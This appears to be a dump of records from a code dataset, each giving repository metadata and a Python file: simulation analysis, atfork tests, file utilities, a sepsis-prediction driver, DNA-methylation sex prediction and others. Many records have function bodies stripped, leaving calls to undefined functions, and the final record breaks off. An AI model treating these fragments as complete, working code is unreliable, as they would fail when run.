6a114f290b289195e2b18bfe3c8fd05836efd438 | 1,821 | py | Python | src/GL/sim/gql_ql_sims_ml_analysis.py | kylmcgr/RL-RNN-SURF | 5d6db3e6ff4534003f2a7e832f221b5e529775d5 | ["Apache-2.0"] | 2 | 2021-03-12T11:12:23.000Z | 2021-05-19T08:32:47.000Z | src/GL/sim/gql_ql_sims_ml_analysis.py | kylmcgr/RL-RNN-SURF | 5d6db3e6ff4534003f2a7e832f221b5e529775d5 | ["Apache-2.0"] | 6 | 2019-12-16T21:54:13.000Z | 2022-02-10T00:16:08.000Z | src/GL/sim/gql_ql_sims_ml_analysis.py | kylmcgr/RL-RNN-SURF | 5d6db3e6ff4534003f2a7e832f221b5e529775d5 | ["Apache-2.0"] | 3 | 2019-11-07T22:44:21.000Z | 2021-02-22T05:51:59.000Z |
# Analyzes the data generated from on-policy simulations of QL, QLP and GQL.
from BD.sim.sims import sims_analysis, merge_sim_files, extract_run_rew
from BD.util.paths import Paths
if __name__ == '__main__':
sims_analysis_BD()
sims_analysis_GQL_BD()
data = merge_sim_files(lambda x: True, Paths.rest_path + 'archive/beh/gql10d-ml-opt/gql10d-ml/')
all_trials = extract_run_rew(data)
output_file = Paths.local_path + 'BD/to_graph_data/gql10d_all_data_ml.csv'
all_trials.to_csv(output_file, header=True)
data = merge_sim_files(lambda x: True, Paths.rest_path + 'archive/beh/gql-ml-opt/gql-ml/')
all_trials = extract_run_rew(data)
output_file = Paths.local_path + 'BD/to_graph_data/gql_all_data_ml.csv'
all_trials.to_csv(output_file, header=True)
| 35.019231 | 100 | 0.665568 |
6a11d7dca909e3885ae2dbc3bc1e2d0a99547ada | 3,901 | py | Python | scripts/randomize_sw2_seed.py | epichoxha/nanodump | 3a269ed427b474a701197e13ce40cb1daf803a82 | ["Apache-2.0"] | null | null | null | scripts/randomize_sw2_seed.py | epichoxha/nanodump | 3a269ed427b474a701197e13ce40cb1daf803a82 | ["Apache-2.0"] | null | null | null | scripts/randomize_sw2_seed.py | epichoxha/nanodump | 3a269ed427b474a701197e13ce40cb1daf803a82 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import glob
import random
import struct
if __name__ == '__main__':
main()
| 32.508333 | 104 | 0.600103 |
6a11fa8d863a9e5b451bd2a7ef2241aafe768509 | 1,289 | py | Python | checker/checker/executer.py | grimpy/hexa-a | 556e9a2a70758bf9c7d70f91776d361b40524c78 | ["Apache-2.0"] | 3 | 2018-02-05T11:43:04.000Z | 2019-02-22T18:11:55.000Z | checker/checker/executer.py | grimpy/hexa-a | 556e9a2a70758bf9c7d70f91776d361b40524c78 | ["Apache-2.0"] | 4 | 2019-03-26T09:51:43.000Z | 2019-03-31T06:41:14.000Z | checker/checker/executer.py | grimpy/hexa-a | 556e9a2a70758bf9c7d70f91776d361b40524c78 | ["Apache-2.0"] | 1 | 2019-03-03T20:55:21.000Z | 2019-03-03T20:55:21.000Z |
from subprocess import run, PIPE, TimeoutExpired, CompletedProcess
from codes import exitcodes
| 30.690476 | 78 | 0.577967 |
6a124e6043f5f93ce124eed73efc4b8488512375 | 1,739 | py | Python | pfm/pf_command/update.py | takahi-i/pfm | 224ca961ca43f50bd877789e2d8659ae838d517f | ["MIT"] | 9 | 2018-01-06T05:44:43.000Z | 2020-06-24T00:15:16.000Z | pfm/pf_command/update.py | takahi-i/pfm | 224ca961ca43f50bd877789e2d8659ae838d517f | ["MIT"] | 27 | 2018-01-06T09:29:48.000Z | 2020-04-10T16:11:59.000Z | pfm/pf_command/update.py | takahi-i/pfm | 224ca961ca43f50bd877789e2d8659ae838d517f | ["MIT"] | 1 | 2018-01-09T01:33:42.000Z | 2018-01-09T01:33:42.000Z |
import json
from pfm.pf_command.base import BaseCommand
from pfm.util.log import logger
| 34.78 | 88 | 0.617021 |
6a12692597c07586454530c9bcf5baae61076b3f | 7,499 | py | Python | tests/atfork/test_atfork.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | ["Apache-2.0"] | null | null | null | tests/atfork/test_atfork.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | ["Apache-2.0"] | null | null | null | tests/atfork/test_atfork.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/python
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Licensed to the PSF under a Contributor Agreement.
#
# Author: Gregory P. Smith <[email protected]>
"""Tests for atfork."""
import os
import sys
import importlib
from xTool.compat import StringIO
import traceback
import unittest
from xTool import atfork
if __name__ == "__main__":
unittest.main()
| 37.123762 | 86 | 0.648887 |
6a131e98cf16cdcab3785e1e0af7a922aba56c50 | 2,213 | py | Python | IO/files/handling.py | brendano257/Zugspitze-Schneefernerhaus | 64bb86ece2eec147f2a7fb412f87ff2313388753 | ["MIT"] | null | null | null | IO/files/handling.py | brendano257/Zugspitze-Schneefernerhaus | 64bb86ece2eec147f2a7fb412f87ff2313388753 | ["MIT"] | null | null | null | IO/files/handling.py | brendano257/Zugspitze-Schneefernerhaus | 64bb86ece2eec147f2a7fb412f87ff2313388753 | ["MIT"] | null | null | null |
import os
from pathlib import Path
__all__ = ['list_files_recur', 'scan_and_create_dir_tree', 'get_all_data_files', 'get_subsubdirs']
def list_files_recur(path):
"""
Cheater function that wraps path.rglob().
:param Path path: path to list recursively
:return list: list of Path objects
"""
files = []
for file in path.rglob('*'):
files.append(file)
return files
def scan_and_create_dir_tree(path, file=True):
"""
Creates all the necessary directories for the file at the end of path to be created.
When specified with a filepath to a file or folder, it creates directories until the path is valid.
:param Path path: must end with a filename, else the final directory won't be created
:param bool file: Boolean, does the given path end with a file? If not, path.parts[-1] will be created
:return None:
"""
parts = path.parts
path_to_check = Path(parts[0])
for i in range(1, len(parts)):
if not path_to_check.exists():
path_to_check.mkdir()
path_to_check = path_to_check / parts[i]
    if not file:
        if not path_to_check.exists():
            path_to_check.mkdir()
def get_all_data_files(path, filetype):
"""
Recursively search the given directory for .xxx files.
:param Path path: Path to search
:param str filetype: str, ".type" of file to search for
:return list: list of file-like Path objects
"""
files = list_files_recur(path)
files[:] = [file for file in files if filetype in file.name]
return files
def get_subsubdirs(path):
"""
Get the second-level subdirectories of the given path.
If given path 'a/b', a sample return would be ['a/b/c/d', 'a/b/c/d2', 'a/b/c/etc']
:param str path:
:return list: list containing Path instances for all paths found two levels below the supplied path
"""
leveltwo_subdirs = []
immediate_subdirs = [os.scandir(subdir) for subdir in os.scandir(path) if Path(subdir).is_dir()]
for scan in immediate_subdirs:
for subdir in scan:
            if Path(subdir).is_dir():
                leveltwo_subdirs.append(Path(subdir))
return leveltwo_subdirs
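# Illustrative usage sketch (hypothetical paths; not part of the original module):
if __name__ == '__main__':
    target = Path('/data/2020/01/results/output.txt')
    # creates /data, /data/2020, ..., /data/2020/01/results (but not the file itself)
    scan_and_create_dir_tree(target)
    xml_files = get_all_data_files(Path('/data'), '.xml')
    print(f'{len(xml_files)} .xml files found under /data')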
| 28.371795 | 106 | 0.66742 |
6a139742e2452134cace4ac02e78a8badeceb098
| 2,617 |
py
|
Python
|
tools/mo/openvino/tools/mo/ops/detection_output_onnx.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 1,127 |
2018-10-15T14:36:58.000Z
|
2020-04-20T09:29:44.000Z
|
tools/mo/openvino/tools/mo/ops/detection_output_onnx.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 439 |
2018-10-20T04:40:35.000Z
|
2020-04-19T05:56:25.000Z
|
tools/mo/openvino/tools/mo/ops/detection_output_onnx.py
|
ryanloney/openvino-1
|
4e0a740eb3ee31062ba0df88fcf438564f67edb7
|
[
"Apache-2.0"
] | 414 |
2018-10-17T05:53:46.000Z
|
2020-04-16T17:29:53.000Z
|
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import numpy as np
from openvino.tools.mo.front.common.partial_infer.utils import dynamic_dimension_value, shape_array, set_input_shapes
from openvino.tools.mo.ops.op import Op
| 39.059701 | 117 | 0.635078 |
6a139aa59f68903a8a744250e0c92696c28eb301
| 2,046 |
py
|
Python
|
driver.py
|
FahimMahmudJoy/Physionet_2019_Sepsis
|
d31bec40aa0359071bfaff1a4d72569c5731a04e
|
[
"BSD-2-Clause"
] | 1 |
2019-06-26T19:38:33.000Z
|
2019-06-26T19:38:33.000Z
|
driver.py
|
FahimMahmudJoy/Physionet_2019_Sepsis
|
d31bec40aa0359071bfaff1a4d72569c5731a04e
|
[
"BSD-2-Clause"
] | null | null | null |
driver.py
|
FahimMahmudJoy/Physionet_2019_Sepsis
|
d31bec40aa0359071bfaff1a4d72569c5731a04e
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
import numpy as np, os, sys
from get_sepsis_score import load_sepsis_model, get_sepsis_score
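# load_challenge_data and save_challenge_predictions are referenced below but not
# defined in this snippet. A minimal sketch of compatible helpers, assuming
# pipe-separated .psv files with a single header row (an assumption, not the
# original code):
def load_challenge_data(input_file):
    with open(input_file, 'r') as f:
        f.readline()  # skip the header row
        data = np.loadtxt(f, delimiter='|')
    if data.ndim == 1:
        data = data.reshape(1, -1)  # keep single-row files 2-D
    return data
def save_challenge_predictions(output_file, scores, labels):
    with open(output_file, 'w') as f:
        f.write('PredictedProbability|PredictedLabel\n')
        for score, label in zip(scores, labels):
            f.write('%g|%d\n' % (score, label))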
if __name__ == '__main__':
# Parse arguments.
if len(sys.argv) != 3:
raise Exception('Include the input and output directories as arguments, e.g., python driver.py input output.')
input_directory = sys.argv[1]
output_directory = sys.argv[2]
# Find files.
files = []
for f in os.listdir(input_directory):
if os.path.isfile(os.path.join(input_directory, f)) and not f.lower().startswith('.') and f.lower().endswith('psv'):
files.append(f)
if not os.path.isdir(output_directory):
os.mkdir(output_directory)
# Load model.
model = load_sepsis_model()
print(model)
# Iterate over files.
for f in files:
# Load data.
input_file = os.path.join(input_directory, f)
data = load_challenge_data(input_file)
# print(type(data))
# Make predictions.
num_rows = len(data)
scores = np.zeros(num_rows)
labels = np.zeros(num_rows)
for t in range(num_rows):
current_data = data[:t+1]
current_score, current_label = get_sepsis_score(current_data, model)
scores[t] = current_score
labels[t] = current_label
# Save results.
output_file = os.path.join(output_directory, f)
save_challenge_predictions(output_file, scores, labels)
| 30.537313 | 124 | 0.623167 |
6a139fa7954e69a2e28f61ebd4a2c8e7028fb83e
| 2,589 |
py
|
Python
|
src/LspRuntimeMonitor.py
|
TafsirGna/ClspGeneticAlgorithm
|
25184afbbd52773b8aed2e268ae98dd9656cacda
|
[
"MIT"
] | null | null | null |
src/LspRuntimeMonitor.py
|
TafsirGna/ClspGeneticAlgorithm
|
25184afbbd52773b8aed2e268ae98dd9656cacda
|
[
"MIT"
] | null | null | null |
src/LspRuntimeMonitor.py
|
TafsirGna/ClspGeneticAlgorithm
|
25184afbbd52773b8aed2e268ae98dd9656cacda
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.5
# -*-coding: utf-8 -*
from collections import defaultdict
from threading import Thread
from time import perf_counter  # note: a bare "time" name imported here would be shadowed by "import time" below
from LspLibrary import bcolors
import time
import matplotlib.pyplot as plt
| 21.940678 | 71 | 0.545384 |
6a1517953444573e16ddd717619e49c3ca5152a5
| 70 |
py
|
Python
|
core/github/parsers/__init__.py
|
goranc/GraphYourCodeVulnerability
|
72c04ed5d63602f295d9ac31e97c97935ca78e1b
|
[
"Apache-2.0"
] | null | null | null |
core/github/parsers/__init__.py
|
goranc/GraphYourCodeVulnerability
|
72c04ed5d63602f295d9ac31e97c97935ca78e1b
|
[
"Apache-2.0"
] | 2 |
2021-12-22T11:59:47.000Z
|
2022-01-19T19:28:36.000Z
|
core/github/parsers/__init__.py
|
goranc/GraphYourCodeVulnerability
|
72c04ed5d63602f295d9ac31e97c97935ca78e1b
|
[
"Apache-2.0"
] | 5 |
2021-12-22T11:09:23.000Z
|
2021-12-26T10:18:49.000Z
|
from .python.parser import PythonParser
all_parsers = [PythonParser]
| 17.5 | 39 | 0.814286 |
6a152a32efa9784006230b4163868ce2479ff3ba
| 20,737 |
py
|
Python
|
methylcheck/predict/sex.py
|
FoxoTech/methylcheck
|
881d14d78e6086aab184716e0b79cdf87e9be8bf
|
[
"MIT"
] | null | null | null |
methylcheck/predict/sex.py
|
FoxoTech/methylcheck
|
881d14d78e6086aab184716e0b79cdf87e9be8bf
|
[
"MIT"
] | 11 |
2021-04-08T16:14:54.000Z
|
2022-03-09T00:22:13.000Z
|
methylcheck/predict/sex.py
|
FoxoTech/methylcheck
|
881d14d78e6086aab184716e0b79cdf87e9be8bf
|
[
"MIT"
] | 1 |
2022-02-10T09:06:45.000Z
|
2022-02-10T09:06:45.000Z
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from pathlib import Path
#app
import methylcheck # uses .load; get_sex uses methylprep models too and detect_array()
import logging
LOGGER = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def _get_copy_number(meth,unmeth):
"""function to return copy number.
requires dataframes of methylated and
unmethylated values. can be raw OR corrected"""
# minfi R version:
# log2(getMeth(object) + getUnmeth(object))
return np.log2(meth+unmeth)
def get_sex(data_source, array_type=None, verbose=False, plot=False, save=False,
on_lambda=False, median_cutoff= -2, include_probe_failure_percent=True,
poobah_cutoff=20, custom_label=None, return_fig=False, return_labels=False):
"""This will calculate and predict the sex of each sample.
inputs:
=======
the "data_source" can be any one of:
path -- to a folder with csv data that contains processed sample data
path -- to a folder with the 'meth_values.pkl' and 'unmeth_values.pkl' dataframes
path -- to a folder also containing samplesheet pkl and poobah_values.pkl, if you want to compare predicted sex with actual sex.
data_containers -- object created from methylprep.run_pipeline() or methylcheck.load(path, 'meth')
tuple of (meth, unmeth) dataframes
array_type (string)
enum: {'27k','450k','epic','epic+','mouse'}
if not specified, it will load the data from data_source and determine the array for you.
median_cutoff
the minimum difference in the medians of X and Y probe copy numbers to assign male or female
(copied from the minfi sex predict function)
include_probe_failure_percent:
True: includes poobah percent per sample as column in the output table and on the plot.
Note: you must supply a 'path' as data_source to include poobah in plots.
poobah_cutoff
The maximum percent of sample probes that can fail before the sample fails. Default is 20 (percent)
Has no effect if `include_probe_failure_percent` is False.
plot
True: creates a plot, with option to `save` as image or `return_fig`.
save
True: saves the plot, if plot is True
return_fig
If True, returns a pyplot figure instead of a dataframe. Default is False.
Note: return_fig will not show a plot on screen.
return_labels: (requires plot == True)
When using poobah_cutoff, the figure only includes A-Z,1...N labels on samples on plot to make it easier to read.
So to get what sample_ids these labels correspond to, you can rerun the function with return_labels=True and it will
skip plotting and just return a dictionary with sample_ids and these labels, to embed in a PDF report if you like.
custom_label:
Option to provide a dictionary with keys as sample_ids and values as labels to apply to samples.
e.g. add more data about samples to the multi-dimensional QC plot
while providing a filepath is the easiest way, you can also pass in a data_containers object,
a list of data_containers containing raw meth/unmeth values, instead. This object is produced
by methylprep.run_pipeline, or by using methylcheck.load(filepath, format='meth') and lets you
customize the import if your files were not prepared using methylprep (non-standand CSV columns, for example)
If a `poobah_values.pkl` file can be found in path, the dataframe returned will also include
percent of probes for X and Y chromosomes that failed quality control, and warn the user if any did.
This feature won't work if a containers object or tuple of dataframes is passed in, instead of a path.
Note: ~90% of Y probes should fail if the sample is female. That chromosome is missing."""
allowed_array_types = {'27k','450k','epic','epic+','mouse'}
try:
from methylprep.files import Manifest
from methylprep.models import ArrayType
except ImportError:
raise ImportError("This function requires methylprep to be installed (pip3 install `methylprep`)")
(data_source_type, data_source) = methylcheck.load_processed._data_source_type(data_source)
# data_source_type is one of {'path', 'container', 'control', 'meth_unmeth_tuple'}
poobah=None
if data_source_type in ('path'):
# this will look for saved pickles first, then csvs or parsing the containers (which are both slower)
# the saved pickles function isn't working for batches yet.
try:
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=None, path=data_source,
compare=False, noob=False, verbose=False)
except Exception as e:
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=None, path=data_source,
compare=False, noob=True, verbose=False)
if include_probe_failure_percent == True and Path(data_source,'poobah_values.pkl').expanduser().exists():
poobah = pd.read_pickle(Path(data_source,'poobah_values.pkl').expanduser())
elif data_source_type in ('container'):
# this will look for saved pickles first, then csvs or parsing the containers (which are both slower)
# the saved pickles function isn't working for batches yet.
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=data_source, path=None,
compare=False, noob=False, verbose=False)
elif data_source_type == 'meth_unmeth_tuple':
(meth, unmeth) = data_source
if len(meth) != len(unmeth):
raise ValueError(f"WARNING: probe count mismatch: meth {len(meth)} -- unmeth {len(unmeth)}")
if array_type == None:
        # get list of X and Y probes - using .methylprep_manifest_files (or MANIFEST_DIR_PATH_LAMBDA) and auto-detected array here
array_type = ArrayType(methylcheck.detect_array(meth, on_lambda=on_lambda))
elif isinstance(array_type,str):
if array_type in allowed_array_types:
array_type = ArrayType(array_type)
else:
raise ValueError(f"Your array_type must be one of these: {allowed_array_types} or None.")
if verbose:
LOGGER.debug(array_type)
LOGGER.setLevel(logging.WARNING)
manifest = Manifest(array_type, on_lambda=on_lambda, verbose=verbose)._Manifest__data_frame # 'custom', '27k', '450k', 'epic', 'epic+'
LOGGER.setLevel(logging.INFO)
x_probes = manifest.index[manifest['CHR']=='X']
y_probes = manifest.index[manifest['CHR']=='Y']
if verbose:
LOGGER.info(f"Found {len(x_probes)} X and {len(y_probes)} Y probes")
# dataframes of meth and unmeth values for the sex chromosomes
x_meth = meth[meth.index.isin(x_probes)]
x_unmeth = unmeth[unmeth.index.isin(x_probes)]
y_meth = meth[meth.index.isin(y_probes)]
y_unmeth = unmeth[unmeth.index.isin(y_probes)]
# create empty dataframe for output
output = pd.DataFrame(index=[s for s in meth.columns], columns=['x_median','y_median','predicted_sex'])
# get median values for each sex chromosome for each sample
x_med = _get_copy_number(x_meth,x_unmeth).median()
y_med = _get_copy_number(y_meth,y_unmeth).median()
# populate output dataframe with values
output['x_median'] = output.index.map(x_med)
output['y_median'] = output.index.map(y_med)
# compute difference
median_difference = output['y_median'] - output['x_median']
# median cutoff - can be manipulated by user --- default = -2 --- used to predict sex
sex0 = ['F' if x < median_cutoff else 'M' for x in median_difference]
# NOTE for testing: GSE85566/GPL13534 (N=120) has 4 samples that are predicted as wrong sex when using -2, but work at -0.5.
# populate dataframe with predicted sex
output['predicted_sex'] = sex0
output = output.round(1)
# if poobah_df exists, calculate percent X and Y probes that failed
sample_failure_percent = {} # % of ALL probes in sample, not just X or Y
if include_probe_failure_percent == True and isinstance(poobah, pd.DataFrame):
p_value_cutoff = 0.05
X_col = []
Y_col = []
failed_samples = []
for column in poobah.columns:
sample_failure_percent[column] = round(100*len(poobah[column][poobah[column] >= p_value_cutoff].index) / len(poobah.index),1)
failed_probe_names = poobah[column][poobah[column] >= p_value_cutoff].index
failed_x_probe_names = list(set(failed_probe_names) & set(x_probes))
failed_y_probe_names = list(set(failed_probe_names) & set(y_probes))
X_percent = round(100*len(failed_x_probe_names)/poobah.index.isin(list(x_probes)).sum(),1)
Y_percent = round(100*len(failed_y_probe_names)/poobah.index.isin(list(y_probes)).sum(),1)
X_col.append(X_percent)
Y_col.append(Y_percent)
if X_percent > 10:
failed_samples.append(column)
output['X_fail_percent'] = X_col #output.index.map(X_col)
output['Y_fail_percent'] = Y_col #output.index.map(Y_col)
if failed_samples != []:
LOGGER.warning(f"{len(failed_samples)} samples had >10% of X probes fail p-value probe detection. Predictions for these may be unreliable:")
LOGGER.warning(f"{failed_samples}")
if data_source_type in ('path'):
output = _fetch_actual_sex_from_sample_sheet_meta_data(data_source, output)
if plot == True:
fig = _plot_predicted_sex(data=output, # 'x_median', 'y_median', 'predicted_sex', 'X_fail_percent', 'Y_fail_percent'
sample_failure_percent=sample_failure_percent,
median_cutoff=median_cutoff,
include_probe_failure_percent=include_probe_failure_percent,
verbose=verbose,
save=save,
poobah_cutoff=poobah_cutoff,
custom_label=custom_label,
data_source_type=data_source_type,
data_source=data_source,
return_fig=return_fig,
return_labels=return_labels,
)
if return_labels:
return fig # these are a lookup dictionary of labels
if return_fig:
return fig
return output
def _plot_predicted_sex(data=pd.DataFrame(),
sample_failure_percent={},
median_cutoff= -2,
include_probe_failure_percent=True,
verbose=False,
save=False,
poobah_cutoff=20, #%
custom_label=None,
data_source_type=None,
data_source=None,
return_fig=False,
return_labels=False):
"""
data columns: ['x_median', 'y_median', 'predicted_sex', 'X_fail_percent', 'Y_fail_percent']
- color is sex, pink or blue
- marker circle size will be larger and more faded if poobah values are worse, smaller and darker if low variance. Like a probability cloud.
- sample text is (ID, delta age)
- sex mismatches are X, matched samples are circles (if samplesheet contains actual sex data)
- omits labels for samples that have LOW failure rates, but shows IDs when failed
- adds legend of sketchy samples and labels
- show delta age on labels (using custom column dict)
- unit tests with custom label and without, and check that controls_report still works with this function
- save_fig
- return_labels, returns a lookup dict instead of plot
if there is a "custom_label" dict passed in, such as (actual_age - predicted_age), it simply adds those this label to the marker text labels.
Dicts must match the data DF index.
"""
if sample_failure_percent != {} and set(sample_failure_percent.keys()) == set(data.index):
data['sample_failure_percent'] = pd.Series(sample_failure_percent)
else:
LOGGER.warning("sample_failure_percent index did not align with output data index")
#sns.set_theme(style="white")
show_mismatches = None if 'sex_matches' not in data.columns else "sex_matches"
if show_mismatches:
data["sex_matches"] = data["sex_matches"].map({0:"Mismatch", 1:"Match"})
show_failure = None if 'sample_failure_percent' not in data.columns else "sample_failure_percent"
sample_sizes = (20, 600)
if show_failure: # avoid sizing dots with narrow range; gives false impression of bad samples.
poobah_range = data["sample_failure_percent"].max() - data["sample_failure_percent"].min()
if poobah_range < poobah_cutoff/2:
show_failure = None
sample_sizes = (40,40)
custom_palette = sns.set_palette(sns.color_palette(['#FE6E89','#0671B7']))
# if only one sex, make sure male is blue; female is pink
# if hasattr(output, 'actual_sex') and set(output.actual_sex) == set('M')
# if first value to be plotted is male, change palette
if hasattr(data, 'predicted_sex') and list(data.predicted_sex)[0] == 'M':
custom_palette = sns.set_palette(sns.color_palette(['#0671B7','#FE6E89']))
fig = sns.relplot(data=data,
x='x_median',
y='y_median',
hue="predicted_sex",
size=show_failure,
style=show_mismatches,
sizes=sample_sizes,
alpha=.5,
palette=custom_palette,
height=8,
aspect=1.34)
ax = fig.axes[0,0]
fig.fig.subplots_adjust(top=.95)
# for zoomed-in plots with few points close together, set the min scale to be at least 2 units.
yscale = plt.gca().get_ylim()
xscale = plt.gca().get_xlim()
if abs(yscale[1]-yscale[0]) < 2.0:
ax.set_xlim(xmin=xscale[0]-1, xmax=xscale[1]+1)
ax.set_ylim(ymin=yscale[0]-1, ymax=yscale[1]+1)
label_lookup = {index_val: chr(i+65) if (i <= 26) else str(i-26) for i,index_val in enumerate(data.index)}
for idx,row in data.iterrows():
if "sample_failure_percent" in row and row['sample_failure_percent'] > poobah_cutoff:
label = f"{label_lookup[idx]}, {custom_label.get(idx)}" if isinstance(custom_label, dict) and custom_label.get(idx) else label_lookup[idx]
ax.text(row['x_median'], row['y_median'], label, horizontalalignment='center', fontsize=10, color='darkred')
else:
label = f"{custom_label.get(idx)}" if isinstance(custom_label, dict) else None
if label:
ax.text(row['x_median']+0.05, row['y_median']+0.05, label, horizontalalignment='center', fontsize=10, color='grey')
if return_labels:
plt.close() # release memory
return label_lookup
if "sample_failure_percent" in data.columns:
N_failed = len(data[data['sample_failure_percent'] > poobah_cutoff].index)
N_total = len(data['sample_failure_percent'].index)
ax.set_title(f"{N_failed} of {N_total} samples failed poobah, with at least {poobah_cutoff}% of probes failing")
else:
ax.set_title(f"Predicted sex based on matching X and Y probes.")
if save:
filepath = 'predicted_sexes.png' if data_source_type != 'path' else Path(data_source,'predicted_sexes.png').expanduser()
plt.savefig(filepath, bbox_inches="tight")
if return_fig:
return fig
plt.show()
def _fetch_actual_sex_from_sample_sheet_meta_data(filepath, output):
"""output is a dataframe with Sample_ID in the index. This adds actual_sex as a column and returns it."""
# controls_report() does the same thing, and only calls get_sex() with the minimum of data to be fast, because these are already loaded. Just passes in meth/unmeth data
# Sample sheet should have 'M' or 'F' in column to match predicted sex.
# merge actual sex into processed output, if available
file_patterns = {
'sample_sheet_meta_data.pkl': 'meta',
'*_meta_data.pkl': 'meta',
'*samplesheet*.csv': 'meta',
'*sample_sheet*.csv': 'meta',
}
loaded_files = {}
for file_pattern in file_patterns:
for filename in Path(filepath).expanduser().rglob(file_pattern):
if '.pkl' in filename.suffixes:
loaded_files['meta'] = pd.read_pickle(filename)
break
if '.csv' in filename.suffixes:
loaded_files['meta'] = pd.read_csv(filename)
break
if len(loaded_files) == 1:
# methylprep v1.5.4-6 was creating meta_data files with two Sample_ID columns. Check and fix here:
# methylcheck 0.7.9 / prep 1.6.0 meta_data lacking Sample_ID when sample_sheet uses alt column names and gets replaced.
if any(loaded_files['meta'].columns.duplicated()):
loaded_files['meta'] = loaded_files['meta'].loc[:, ~loaded_files['meta'].columns.duplicated()]
LOGGER.info("Removed a duplicate Sample_ID column in samplesheet")
if 'Sample_ID' in loaded_files['meta'].columns:
loaded_files['meta'] = loaded_files['meta'].set_index('Sample_ID')
elif 'Sentrix_ID' in loaded_files['meta'].columns and 'Sentrix_Position' in loaded_files['meta'].columns:
loaded_files['meta']['Sample_ID'] = loaded_files['meta']['Sentrix_ID'].astype(str) + '_' + loaded_files['meta']['Sentrix_Position'].astype(str)
loaded_files['meta'] = loaded_files['meta'].set_index('Sample_ID')
else:
raise ValueError("Your sample sheet must have a Sample_ID column, or (Sentrix_ID and Sentrix_Position) columns.")
# fixing case of the relevant column
renamed_column = None
if ('Gender' in loaded_files['meta'].columns or 'Sex' in loaded_files['meta'].columns):
if 'Gender' in loaded_files['meta'].columns:
renamed_column = 'Gender'
elif 'Sex' in loaded_files['meta'].columns:
renamed_column = 'Sex'
else:
renamed_columns = {col:(col.title() if col.lower() in ('sex','gender') else col) for col in loaded_files['meta'].columns}
loaded_files['meta'] = loaded_files['meta'].rename(columns=renamed_columns)
if 'Gender' in renamed_columns.values():
renamed_column = 'Gender'
elif 'Sex' in renamed_columns.values():
renamed_column = 'Sex'
if renamed_column is not None:
# next, ensure samplesheet Sex/Gender (Male/Female) are recoded as M/F; controls_report() does NOT do this step, but should.
sex_values = set(loaded_files['meta'][renamed_column].unique())
#print('sex_values', sex_values)
if not sex_values.issubset(set(['M','F'])): # subset, because samples might only contain one sex
if 'Male' in sex_values or 'Female' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'Male':'M', 'Female':'F'})
elif 'male' in sex_values or 'female' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'male':'M', 'female':'F'})
elif 'MALE' in sex_values or 'FEMALE' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'MALE':'M', 'FEMALE':'F'})
elif 'm' in sex_values or 'f' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'m':'M', 'f':'F'})
else:
raise ValueError(f"Cannot compare with predicted sex because actual sexes listed in your samplesheet are not understood (expecting M or F): (found {sex_values})")
output['actual_sex'] = None
output['sex_matches'] = None
for row in output.itertuples():
try:
actual_sex = str(loaded_files['meta'].loc[row.Index].get(renamed_column))
except KeyError:
if 'Sample_ID' in output.columns:
LOGGER.warning("Sample_ID was another column in your output DataFrame; Set that to the index when you pass it in.")
raise KeyError("Could not read actual sex from meta data to compare.")
if isinstance(actual_sex, pd.Series):
LOGGER.warning(f"Multiple samples matched actual sex for {row.Index}, because Sample_ID repeats in sample sheets. Only using first match, so matches may not be accurate.")
actual_sex = actual_sex[0]
if hasattr(row,'predicted_sex'):
sex_matches = 1 if actual_sex.upper() == str(row.predicted_sex).upper() else 0
else:
sex_matches = np.nan
output.loc[row.Index, 'actual_sex'] = actual_sex
output.loc[row.Index, 'sex_matches'] = sex_matches
else:
pass # no Sex/Gender column found in samplesheet
return output
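# Illustrative usage sketch (hypothetical processed-data folder; not part of the
# original module):
#   results = get_sex('/data/my_processed_idats/', verbose=True, plot=False)
#   print(results[['x_median', 'y_median', 'predicted_sex']].head())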
| 53.583979 | 191 | 0.672711 |
6a15c95427effad3d19c61b8dfdb12b52e2999fa
| 649 |
py
|
Python
|
backend/accounts/migrations/0003_auto_20201115_1537.py
|
mahmoud-batman/quizz-app
|
bebeff8d055ea769773cd1c749f42408aa83f5b9
|
[
"MIT"
] | null | null | null |
backend/accounts/migrations/0003_auto_20201115_1537.py
|
mahmoud-batman/quizz-app
|
bebeff8d055ea769773cd1c749f42408aa83f5b9
|
[
"MIT"
] | null | null | null |
backend/accounts/migrations/0003_auto_20201115_1537.py
|
mahmoud-batman/quizz-app
|
bebeff8d055ea769773cd1c749f42408aa83f5b9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.2 on 2020-11-15 15:37
import django.core.validators
from django.db import migrations, models
| 32.45 | 277 | 0.697997 |
6a164cca97745158870c1da7ad0a330912380e28
| 2,504 |
py
|
Python
|
tests/test_basics.py
|
sirosen/git-fortune
|
69ef3e18506aa67fdc812854f1588828ea4e7448
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tests/test_basics.py
|
